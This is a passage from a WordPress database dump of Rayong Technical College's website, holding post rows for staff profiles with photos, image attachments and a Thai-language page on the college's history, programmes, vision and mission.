(903, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Framed Border', '', 'publish', 'closed', 'closed', '', 'framed-border', '', '', '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 0, 'http://www.technicrayong.ac.th/popup_theme/framed-border/', 0, 'popup_theme', '', 0),
(911, 1, '2018-01-30 18:35:15', '2018-01-30 11:35:15', '', 'Default Theme', '', 'inherit', 'closed', 'closed', '', '898-revision-v1', '', '', '2018-01-30 18:35:15', '2018-01-30 11:35:15', '', 898, 'http://www.technicrayong.ac.th/898-revision-v1/', 0, 'revision', '', 0),
(920, 1, '2018-01-31 10:03:33', '2018-01-31 03:03:33', ' \r\n<h3><img class=\"aligncenter wp-image-4257\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49-1.jpg\" alt=\"\" width=\"220\" height=\"293\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Yutthana Onsomkrit</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Student Affairs Development</h3>', 'Deputy Director of Student Affairs Development', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99-2', '', '', '2018-11-07 11:05:30', '2018-11-07 04:05:30', '', 0, 'http://www.technicrayong.ac.th/?p=920', 483, 'post', '', 0),
(921, 1, '2018-01-31 10:03:33', '2018-01-31 03:03:33', '<a href=\"/wp-content/uploads/2018/01/yuttana.jpg\"><img class=\"aligncenter size-full wp-image-639\" src=\"/wp-content/uploads/2018/01/yuttana.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '920-revision-v1', '', '', '2018-01-31 10:03:33', '2018-01-31 03:03:33', '', 920, 'http://www.technicrayong.ac.th/920-revision-v1/', 0, 'revision', '', 0),
(922, 1, '2018-01-31 10:09:02', '2018-01-31 03:09:02', ' \r\n<h3><img class=\"aligncenter wp-image-4255\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-2.jpg\" alt=\"\" width=\"220\" height=\"215\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Anuphap Vasasiri</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Academic Affairs</h3>', 'Deputy Director of Academic Affairs', '', 'publish', 'closed', 'open', '', 'deputy-director-of-academic-affairs', '', '', '2018-11-07 11:07:00', '2018-11-07 04:07:00', '', 0, 'http://www.technicrayong.ac.th/?p=922', 481, 'post', '', 0),
(923, 1, '2018-01-31 10:09:02', '2018-01-31 03:09:02', '<a href=\"/wp-content/uploads/2018/01/kittipong.jpg\"><img class=\"aligncenter size-full wp-image-640\" src=\"/wp-content/uploads/2018/01/kittipong.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายกิตติพงค์ อุตตมะเวทิน\r\nรองผู้อำนวยการฝ่ายบริหารทรัพยากร</h3>', 'รองผู้อำนวยการฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '922-revision-v1', '', '', '2018-01-31 10:09:02', '2018-01-31 03:09:02', '', 922, 'http://www.technicrayong.ac.th/922-revision-v1/', 0, 'revision', '', 0),
(924, 1, '2018-01-31 10:10:12', '2018-01-31 03:10:12', '<img class=\"aligncenter wp-image-4252\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14-1.jpg\" alt=\"\" width=\"220\" height=\"281\" />\r\n<h3 style=\"text-align: center;\">Mrs.Nattharee Sirikunpunyaporn\r\nDeputy Director of Resource Management</h3>', 'Deputy Director of Resource Management', '', 'publish', 'closed', 'open', '', 'deputy-director-of-resource-management', '', '', '2018-11-07 10:39:19', '2018-11-07 03:39:19', '', 0, 'http://www.technicrayong.ac.th/?p=924', 479, 'post', '', 0),
(925, 1, '2018-01-31 10:10:12', '2018-01-31 03:10:12', '<a href=\"/wp-content/uploads/2018/01/nuttaree.jpg\"><img class=\"aligncenter size-full wp-image-641\" src=\"/wp-content/uploads/2018/01/nuttaree.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\r\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '924-revision-v1', '', '', '2018-01-31 10:10:12', '2018-01-31 03:10:12', '', 924, 'http://www.technicrayong.ac.th/924-revision-v1/', 0, 'revision', '', 0),
(926, 1, '2018-01-31 10:11:23', '2018-01-31 03:11:23', ' \r\n<h3><img class=\"aligncenter size-full wp-image-4249\" src=\"/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1.jpg\" alt=\"\" width=\"220\" height=\"264\" /></h3>\r\n<h3 style=\"text-align: center;\">Acting Sub Lt.Chucheep Arunluang</h3>\r\n<h3 style=\"text-align: center;\">Director of Rayong Technical College</h3>\r\n ', 'Director of Rayong Technical College', '', 'publish', 'closed', 'open', '', 'director-of-rayong-technical-college', '', '', '2018-11-07 10:21:57', '2018-11-07 03:21:57', '', 0, 'http://www.technicrayong.ac.th/?p=926', 477, 'post', '', 0),
(927, 1, '2018-01-31 10:11:23', '2018-01-31 03:11:23', '<a href=\"/wp-content/uploads/2018/01/S__21389369.jpg\"><img class=\"aligncenter size-large wp-image-671\" src=\"/wp-content/uploads/2018/01/S__21389369-749x1024.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายไสว สีบูจันดี\r\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '926-revision-v1', '', '', '2018-01-31 10:11:23', '2018-01-31 03:11:23', '', 926, 'http://www.technicrayong.ac.th/926-revision-v1/', 0, 'revision', '', 0),
(930, 3, '2018-02-02 13:48:11', '2018-02-02 06:48:11', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #333333;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b>สถาน</b><b>ที่ตั้ง </b></span><b> </b><span style=\"color: #333333;\">วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span><span style=\"color: #333333;\">ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></span></h4>\r\n<h4><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span><span style=\"color: #333333;\">โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span><span style=\"color: #333333;\">มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b>ความเป็นมา</b></span><b> </b> <span style=\"color: #333333;\"><i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b>ความเป็นมา</b></span><b> </b><i><span style=\"color: #333333;\">ในปีพ.ศ.2501</span></i><span style=\"color: #333333;\"> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></span></h4>\r\n<h2><span style=\"color: #333333;\"><b>การจัดการศึกษา</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2481</i></b> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) </span></span><span style=\"color: #333333;\">เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #000000;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2485</i></b></span><b> </b></span> <span style=\"color: #333333;\">เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2492</i></b></span><b><span style=\"color: #000000;\"> </span> </b><span style=\"color: #333333;\">เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2493 </i></b>ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2496 </i></b>ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง </span> </span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2500 </i></b>เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2503 </i></b>เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2506 </i></b>เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2513 </i></b>เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น </span> </span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2519</i></b></span> <span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2520 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า </span></span></h4>\r\n<h4 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><span style=\"color: #808080;\"><span style=\"color: #000000;\"><b><i><span style=\"color: #333333;\">พ.ศ.2522</span> </i></b></span><span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i><span style=\"color: #333333;\">พ.ศ.2524</span> </i></b><span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคอุตสาหกรรมปิโตรเคมี </span></span><span style=\"color: #808080;\"><span style=\"color: #333333;\">แผนกเทคนิคปฏิบัติการ เป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ </span> </span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2527</i></b></span> <b> </b><span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยี</span></span><span style=\"color: #808080;\"><span style=\"color: #333333;\">คหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2532 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม</span></span><span style=\"color: #808080;\"><span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ </span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2533</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2534</i></b> </span><b> </b><span style=\"color: #333333;\">เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรง</span></span><span style=\"color: #333333;\">แรม</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #000000;\"><b><i>พ.ศ.2535</i></b></span> <b> </b><span style=\"color: #333333;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ </span></span><span style=\"color: #333333;\">สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) </span><span style=\"color: #808080;\"><span style=\"color: #333333;\">ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #333333;\"><b><i>พ.ศ.2537</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิค</span></span><span style=\"color: #333333;\">การผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขาวิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</span></h4>\r\n<h2><span style=\"color: #333333;\"><b>สภาพชุมชน</b></span></h2>\r\n<h4><span style=\"color: #ffffff;\">000000</span><span style=\"color: #333333;\"><i>สภาพเศรษฐกิจของจังหวัดระยอง </i>เป็นแหล่งท่องเที่ยวเพราะมีความงามของธรรมชาติ เป็นแหล่งผลิตอาหารทะเล เป็นแหล่งปลูกผลไม้เมืองร้อนที่มีคุณภาพ และเป็นที่ตั้งของโครงการพัฒนาพื้นที่ชายฝั่งทะเลตะวันออก ซึ่งเป็นเขตเศรษฐกิจแห่งใหม่ของประเทศ</span></h4>\r\n<h4><i><span style=\"color: #ffffff;\">000000</span><span style=\"color: #333333;\">วิทยาลัยเทคนิคระยอง</span></i><span style=\"color: #333333;\"> ตั้งอยู่ใกล้สถานที่ราชการ คือ โรงเรียนประจำจังหวัด ที่ว่าการอำเภอเมือง สำนักงานเขตพื้นที่การศึกษาสำนักงานที่ดินจังหวัด ชุมชนสัมฤทธิ์ ชุมชนมุสลิมปากคลอง ชุมชนทางไผ่ มีอาชีพค้าขายขนาดเล็ก รับจ้าง และทำสวนมะม่วง พุทรา ประมง แพปลา สภาพเศรษฐกิจปานกลาง ชุมชนมีความสัมพันธ์กับวิทยาลัยค่อนข้างดี และมีส่วนร่วมในการบริหารจัดการสถานศึกษา</span></h4>\r\n<h2><span style=\"color: #333333;\"><strong>ปรัชญาวิทยาลัย</strong></span></h2>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #333333;\">สามัคคี เรียนดี วินัยเด่น เน้นคุณธรรม</span></h3>\r\n<h2><strong><span style=\"color: #333333;\">วิสัยทัศน์ (Vision)</span></strong></h2>\r\n<h3><span style=\"color: #333333;\">วิทยาลัยเทคนิคระยองเป็นองค์กรมุ่งพัฒนา และสร้างคุณภาพการอาชีวศึกษาสู่มาตรฐานสากล</span></h3>\r\n<h2><strong><span style=\"color: #333333;\">พันธกิจ (Mission)</span></strong></h2>\r\n<h4><span style=\"color: #333333;\">1. พัฒนาบริหารการจัดการอาชีวศึกษาให้มีมาตรฐานโดยการกระจายอำนาจด้วยเทคโนโลยีสารสนเทศให้สอดคล้องกับนโยบาย Thailand 4.0</span></h4>\r\n<h4><span style=\"color: #333333;\">2. พัฒนาผู้เรียน และกำลังคน ด้านวิชาชีพในท้องถิ่นให้มีความรู้ และทักษะทางวิชาชีพในทักษะที่จำเป็นในศตวรรษที่ 21 อย่างหลากหลายและต่อเนื่อง</span></h4>\r\n<h4><span style=\"color: #333333;\">3. ส่งเสริมและสนับสนุนการวิจัยและพัฒนานวัตกรรมด้านวิชาชีพ เพื่อสร้างความเข้มแข็งของสถานศึกษาและชุมชนให้สอดคล้องกับภูมิปัญญาของท้องถิ่นรองรับระเบียงเศรษฐกิจภาคตะวันออก</span></h4>\r\n<h4><span style=\"color: #333333;\">4. ส่งเสริม สนับสนุน การจัดกิจกรรมอย่างหลากหลายเพื่อให้ผู้เรียนเป็นคนดีมีคุณธรรมและจริยธรรม</span></h4>\r\n<h4><span style=\"color: #333333;\">5. สร้างเครือข่ายความร่วมมือให้ทุกภาคส่วนมีส่วนร่วมในการพัฒนาการจัดการอาชีวศึกษา</span></h4>\r\n<h4><span style=\"color: #333333;\">6. ส่งเสริม/พัฒนา ครูและบุคลากรทางการศึกษาเพื่อความเป็นเลิศ มั่นคง และก้าวหน้าในวิชาชีพ</span></h4>\r\n<h2><span style=\"color: #333333;\">เอกลักษณ์</span></h2>\r\n<h3><span style=\"color: #333333;\">มุ่งมั่นพัฒนากำลังคนด้านวิชาชีพ และบริการสังคม</span></h3>\r\n<h2>อัตลักษณ์</h2>\r\n<h4>เก่งคิด คือ ผู้เรียนคิด</h4>', 'ข้อมูลสถานศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2', '', '', '2019-04-03 15:33:50', '2019-04-03 08:33:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=930', 0, 'page', '', 0),
(932, 3, '2018-02-02 13:30:07', '2018-02-02 06:30:07', '', '2-2-2561 13-24-27', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-24-27', '', '', '2018-02-02 13:30:07', '2018-02-02 06:30:07', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-24-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(933, 3, '2018-02-02 13:30:10', '2018-02-02 06:30:10', '', '2-2-2561 13-24-50', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-24-50', '', '', '2018-02-02 13:30:10', '2018-02-02 06:30:10', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-24-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(934, 3, '2018-02-02 13:30:11', '2018-02-02 06:30:11', '', '2-2-2561 13-25-19', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-25-19', '', '', '2018-02-02 13:30:11', '2018-02-02 06:30:11', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-25-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(935, 3, '2018-02-02 13:30:11', '2018-02-02 06:30:11', '', '2-2-2561 13-26-02', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-26-02', '', '', '2018-02-02 13:30:11', '2018-02-02 06:30:11', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-26-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(936, 3, '2018-02-02 13:30:12', '2018-02-02 06:30:12', '', '2-2-2561 13-26-25', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-26-25', '', '', '2018-02-02 13:30:12', '2018-02-02 06:30:12', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-26-25.jpg', 0, 'attachment', 'image/jpeg', 0),
(937, 3, '2018-02-02 13:30:13', '2018-02-02 06:30:13', '', '2-2-2561 13-27-25', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-27-25', '', '', '2018-02-02 13:30:13', '2018-02-02 06:30:13', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-27-25.jpg', 0, 'attachment', 'image/jpeg', 0),
(938, 3, '2018-02-02 13:30:14', '2018-02-02 06:30:14', '', '2-2-2561 13-27-51', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-27-51', '', '', '2018-02-02 13:30:14', '2018-02-02 06:30:14', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-27-51.jpg', 0, 'attachment', 'image/jpeg', 0),
(939, 3, '2018-02-02 13:30:15', '2018-02-02 06:30:15', '', '2-2-2561 13-28-48', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-28-48', '', '', '2018-02-02 13:30:15', '2018-02-02 06:30:15', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-28-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(941, 3, '2018-02-02 13:37:43', '2018-02-02 06:37:43', '', '2-2-2561 13-23-39', '', 'inherit', 'closed', 'closed', '', '2-2-2561-13-23-39', '', '', '2018-02-02 13:37:43', '2018-02-02 06:37:43', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/2-2-2561-13-23-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(942, 3, '2018-02-02 13:44:33', '2018-02-02 06:44:33', '<h3><strong><span style=\"color: #0000ff;\">ประวัติวิทยาลัย</span></strong></h3>\r\n<img class=\"alignleft wp-image-941 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-23-39.jpg\" alt=\"\" width=\"690\" height=\"527\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"wp-image-932 size-full alignleft\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-24-27.jpg\" alt=\"\" width=\"708\" height=\"530\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-933 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-24-50.jpg\" alt=\"\" width=\"698\" height=\"527\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-934 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-25-19.jpg\" alt=\"\" width=\"701\" height=\"531\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-935 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-26-02.jpg\" alt=\"\" width=\"701\" height=\"534\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-936 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-26-25.jpg\" alt=\"\" width=\"696\" height=\"531\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-937 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-27-25.jpg\" alt=\"\" width=\"696\" height=\"530\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-938 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-27-51.jpg\" alt=\"\" width=\"711\" height=\"536\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-939 size-full\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-28-48.jpg\" alt=\"\" width=\"707\" height=\"535\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-02 13:44:33', '2018-02-02 06:44:33', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(943, 3, '2018-02-02 13:47:28', '2018-02-02 06:47:28', '<h3></h3>\r\n<img class=\"wp-image-941 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-23-39.jpg\" alt=\"\" width=\"690\" height=\"527\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-932 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-24-27.jpg\" alt=\"\" width=\"708\" height=\"530\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-933 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-24-50.jpg\" alt=\"\" width=\"698\" height=\"527\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-934 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-25-19.jpg\" alt=\"\" width=\"701\" height=\"531\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-935 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-26-02.jpg\" alt=\"\" width=\"701\" height=\"534\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-936 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-26-25.jpg\" alt=\"\" width=\"696\" height=\"531\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-937 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-27-25.jpg\" alt=\"\" width=\"696\" height=\"530\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-938 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-27-51.jpg\" alt=\"\" width=\"711\" height=\"536\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-939 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/2-2-2561-13-28-48.jpg\" alt=\"\" width=\"707\" height=\"535\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-02 13:47:28', '2018-02-02 06:47:28', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
